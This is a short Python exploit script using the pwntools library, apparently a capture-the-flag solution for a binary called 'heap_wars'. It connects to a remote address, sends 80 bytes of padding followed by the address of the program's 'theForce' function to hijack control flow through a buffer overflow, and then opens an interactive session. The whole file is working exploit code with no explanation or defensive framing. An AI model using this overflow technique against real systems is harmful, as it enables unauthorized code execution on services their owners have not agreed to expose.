#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./heap_wars", checksec=False)
# r = process()
r = remote("94.72.112.248", 1337)

# funcs
s = lambda a: r.sendlineafter(b": ", a)

# buf
s(b"1")
buf = b"A"*80
buf += p64(target.sym.theForce)
s(buf)

r.interactive()